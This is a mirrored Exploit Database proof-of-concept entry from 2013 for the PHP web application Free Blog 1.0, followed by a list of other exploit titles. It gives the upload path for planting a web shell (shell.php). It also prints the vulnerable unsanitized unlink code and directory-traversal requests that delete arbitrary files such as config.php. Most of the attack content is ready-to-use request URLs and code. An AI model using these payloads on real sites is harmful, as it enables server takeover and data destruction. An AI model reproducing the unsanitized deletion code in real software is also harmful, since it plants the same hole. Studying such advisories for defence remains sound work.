Free Blog 1.0 – Multiple Vulnerabilities

Exploit Database
9 阅读

作者： cr4wl3r

日期： 2013-01-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/23994/

# Free Blog 1.0 Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Free_Blog.txt
# Software Link: http://blog.sdnex.com/
# Tested: Ubuntu 12.04.1 LTS

Proof of concept:

Arbitrary File Upload Vulnerability

 http://bastardlabs/blog_path/up.php

Shell will be available here

 http://bastardlabs/blog_path/log/images/shell.php



Arbitrary File Deletion Vulnerability

----------
49 <?php
50 if($_GET['del']){ 
51 $id=$_GET['del'];
52 unlink("./log/images/$id");
53 }
54 ?>
----------

 http://bastardlabs/blog_path/up.php?del=../../[file]
 http://bastardlabs/blog_path/up.php?del=../../config.php

------------------------------
My sweetheart
http://www.photoshow.com/watch/rx9IX5ZS

last Exploits
Free Blog 1.0 – Multiple Vulnerabilities的更多信息

DynPG CMS 4.1.0 – Multiple Vulnerabilities：
DesktopOnNet 3 Beta9 – Local File Inclusion：
2DayBiz ybiz Network Community Script – SQL Injection / Cross-Site Scripting：
ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet – Directory Traversal：
Mevin Basic PHP Events Lister 2.03 – Cross-Site Request Forgery：
Joomla! Component Youtube Gallery 4.1.7 – SQL Injection：
My File Explorer 1.3.1 iOS – Multiple Web Vulnerabilities：
KBVault MySQL 0.16a – Arbitrary File Upload：